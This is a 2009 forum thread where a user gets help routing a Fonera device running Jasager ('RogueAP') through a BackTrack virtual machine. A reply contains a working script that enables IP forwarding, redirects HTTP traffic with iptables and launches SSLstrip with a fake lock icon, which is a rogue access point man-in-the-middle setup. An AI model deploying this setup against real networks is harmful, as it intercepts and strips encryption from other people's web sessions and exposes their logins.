rosbif Posted December 23, 2009 Posted December 23, 2009 Hi there, I've spent the best part of the day searching through the site and googling for help, before deciding to bother you all with this. Excuse the newbie questions. I'm running backtrack in a vmware and want to set up the fonera to run through this. I got it set up through windows with ICS fine, but am having issues with the backtrack set up. Primarily because of the networking side of things through the VMWare. The route I'm expecting is Fonera -> VMWare Backtrack -> Windows box -> Internet (I think this is right) Here are some bits of network info. 1. Home network 192.168.0.0/24 2. Backtrack network through VMWware 192.168.124.0/24 3. Fonera IP address : 192.168.1.1 4. Internet gateway : 192.168.0.100 5. VMWare eth0 : 192.168.124.128 6. VMWare adapter (Windows host side) : 192.168.124.10 7. IP address of Windows box 192.168.0.102 VMware ifconfig: eth0 Link encap:Ethernet HWaddr 00:0c:29:f7:56:e2 inet addr:192.168.124.128 Bcast:192.168.124.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fef7:56e2/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:39225 errors:0 dropped:0 overruns:0 frame:0 TX packets:34972 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:24833456 (24.8 MB) TX bytes:3821384 (3.8 MB) Interrupt:18 Base address:0x1080 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:392 errors:0 dropped:0 overruns:0 frame:0 TX packets:392 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:19600 (19.6 KB) TX bytes:19600 (19.6 KB) Fonera ifconfig: ath0 Link encap:Ethernet HWaddr 00:18:84:A5:85:F9 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:748 errors:0 dropped:44 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 B) TX bytes:295263 (288.3 KiB) br-lan Link encap:Ethernet HWaddr 00:18:84:A5:85:F8 inet addr:192.168.1.1 Bcast:192.168.1.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2720 errors:0 dropped:0 overruns:0 frame:0 TX packets:2673 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:258665 (252.6 KiB) TX bytes:267270 (261.0 KiB) eth0 Link encap:Ethernet HWaddr 00:18:84:A5:85:F8 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2720 errors:0 dropped:0 overruns:0 frame:0 TX packets:3402 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:302185 (295.1 KiB) TX bytes:569405 (556.0 KiB) Interrupt:255 Base address:0x1000 eth0.0 Link encap:Ethernet HWaddr 00:18:84:A5:85:F8 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2720 errors:0 dropped:0 overruns:0 frame:0 TX packets:2673 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:258665 (252.6 KiB) TX bytes:267270 (261.0 KiB) eth0.1 Link encap:Ethernet HWaddr 00:18:84:A5:85:F8 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:728 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 B) TX bytes:292656 (285.7 KiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:12 errors:0 dropped:0 overruns:0 frame:0 TX packets:12 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:720 (720.0 B) TX bytes:720 (720.0 B) wifi0 Link encap:UNSPEC HWaddr 00-18-84-A5-85-F9-00-00-00-00-00-00-00-00-00-00 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:22471 errors:0 dropped:0 overruns:0 frame:689 TX packets:2836 errors:485 dropped:0 overruns:0 carrier:0 root@RogueAP:~# brctl show bridge name bridge id STP enabled interfaces br-lan 8000.001884a585f8 no ath0 eth0.0 fonera /etc/config/network: config 'interface' 'loopback' option 'ifname' 'lo' option 'proto' 'static' option 'ipaddr' '127.0.0.1' option 'netmask' '255.0.0.0' config 'interface' 'lan' option 'type' 'bridge' option 'ipaddr' '192.168.1.1' option 'netmask' '255.255.255.0' option 'ifname' 'eth0.0' option 'dns' '8.8.8.8 8.8.4.4' option 'proto' 'static' option 'macaddr' '' option 'ip6addr' '' option 'ip6gw' '' option 'gateway' '' config 'interface' 'wan' option 'ifname' 'eth0.1' option 'macaddr' '' option 'ip6addr' '' option 'netmask' '' option 'gateway' '192.168.0.100' option 'ip6gw' '' option 'dns' '' option 'proto' 'dhcp' option 'ipaddr' '' config 'interface' 'wifi' option 'ifname' 'ath0' option 'proto' 'dhcp' option 'macaddr' '' option 'ipaddr' '' option 'ip6addr' '' option 'netmask' '' option 'gateway' '' option 'ip6gw' '' option 'dns' '' fonera /etc/config/dhcp config 'dnsmasq' option 'domainneeded' '1' option 'boguspriv' '1' option 'filterwin2k' '0' option 'localise_queries' '1' option 'local' '/lan/' option 'domain' 'lan' option 'expandhosts' '1' option 'nonegcache' '0' option 'authoritative' '1' option 'readethers' '1' option 'leasefile' '/tmp/dhcp.leases' option 'resolvfile' '/tmp/resolv.conf.auto' config 'dhcp' 'lan' option 'interface' 'lan' option 'start' '100' option 'limit' '150' option 'leasetime' '12h' list 'dhcp_option' '3,192.168.0.100' config 'dhcp' 'wan' option 'interface' 'wan' option 'ignore' '1' config 'host' option 'name' 'BackTrackBox' option 'ip' '192.168.0.102' config 'dhcp' 'cfg0875fa' option 'start' '2' option 'limit' '250' option 'leasetime' '60m' option 'ignore' '0' option 'interface' 'wifi' Now I can access the internet through the VMWare, no problems, but through the fonera I can't even ping IP addresses. root@RogueAP:/etc/config# ping 192.168.0.100 PING 192.168.0.100 (192.168.0.100): 56 data bytes ping: sendto: Network is unreachable root@RogueAP:/etc/config# ping 192.168.124.128 PING 192.168.124.128 (192.168.124.128): 56 data bytes ping: sendto: Network is unreachable I'm sure I've screwed something up. Can anyone give me any clues/help please? TIA, Neil Quote
Netshroud Posted December 23, 2009 Posted December 23, 2009 Firstly, you dont needs ICS enabled on the windows box. You also have what appears to be a complete salad of IP addresses. Your home network is 192.168.0.0/24, so your Windows box and the Backtrack VM need one adapter on that network. The Fon is at 192.168.1.1, I believe by default it's a /16. I would recommend changing the Fon to a completely different subnet, so you can tell what IP is on what network at a glance. I like the 172.[16-32].[0-254].0/24 or /16 network, as the private 172.[16-32] range is almost never used. Then you need to bridge your vmnets to individual adapters. I have vmnet0 bridged to my home network and vmnet1 bridged to my LAN (I'm doing the same as you, but with Ubuntu 9.10). You can change it with vmnetcfg.exe, for me it was located in C:\Program Files (x86)\VMware\VMware Workstation\. So on your VM, you should have 2 virtual NICs. bridge one (say eth0) to your home network, and bridge the other (say eth1) to the Fon network. Then you need to configure the Fon, as well as dnsmasq on the Fon, for the gateway IP to be that of the VM, and to setup DNS. Following that, enable IP forwarding on the VM. This is simply changing /proc/sys/net/ipv4/ip_forward to be a 1 instead of a 0, then running iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE. I use this little script to set up 'ICS', set up my IPs, configure iptables for SSLstrip, and launch SSLstrip: echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123 sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE sudo ifconfig eth1 172.20.182.1 netmask 255.255.255.0 sudo dhclient eth0 python sslstrip.py -l 64123 -f lock.ico (eth1 is Fon network, eth0 is home network.) If it doesn't exist, create ath0 using the Jasager interface, make sure it's bridged to your LAN port (brctl show, and if it isn't, brctl addif br-lan ath0). Make sure your box is plugged into the LAN port of the Fon+ and you're done. Quote
rosbif Posted December 24, 2009 Author Posted December 24, 2009 Firstly, you dont needs ICS enabled on the windows box. Y'know, I try to be clear in my posts so I can get my message across and I still screw it up. I meant to say that I'd tested my setup using Windows ICS, just to see if I could get it all working. Now my aim is to do the same in the VMWare session. You also have what appears to be a complete salad of IP addresses. I know. Having the VMWare session just threw me completely. Your home network is 192.168.0.0/24, so your Windows box and the Backtrack VM need one adapter on that network. The Fon is at 192.168.1.1, I believe by default it's a /16. I would recommend changing the Fon to a completely different subnet, so you can tell what IP is on what network at a glance. I like the 172.[16-32].[0-254].0/24 or /16 network, as the private 172.[16-32] range is almost never used. Then you need to bridge your vmnets to individual adapters. I have vmnet0 bridged to my home network and vmnet1 bridged to my LAN (I'm doing the same as you, but with Ubuntu 9.10). You can change it with vmnetcfg.exe, for me it was located in C:\Program Files (x86)\VMware\VMware Workstation\. So on your VM, you should have 2 virtual NICs. bridge one (say eth0) to your home network, and bridge the other (say eth1) to the Fon network. Then you need to configure the Fon, as well as dnsmasq on the Fon, for the gateway IP to be that of the VM, and to setup DNS. Following that, enable IP forwarding on the VM. This is simply changing /proc/sys/net/ipv4/ip_forward to be a 1 instead of a 0, then running iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE. I use this little script to set up 'ICS', set up my IPs, configure iptables for SSLstrip, and launch SSLstrip: echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward > /dev/null sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 64123 sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE sudo ifconfig eth1 172.20.182.1 netmask 255.255.255.0 sudo dhclient eth0 python sslstrip.py -l 64123 -f lock.ico (eth1 is Fon network, eth0 is home network.) If it doesn't exist, create ath0 using the Jasager interface, make sure it's bridged to your LAN port (brctl show, and if it isn't, brctl addif br-lan ath0). Make sure your box is plugged into the LAN port of the Fon+ and you're done. Lovely stuff, thanks very much for your input on this. I'll report back later on. Neil Quote
rosbif Posted December 26, 2009 Author Posted December 26, 2009 Lovely stuff, thanks very much for your input on this. I'll report back later on. Neil Dunno if it's bad form to reply to your own posts, but I played around with the settings as described above, and aside from a bit of VMWare network tweaking, it worked fine. Thanks very much for your help. N Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.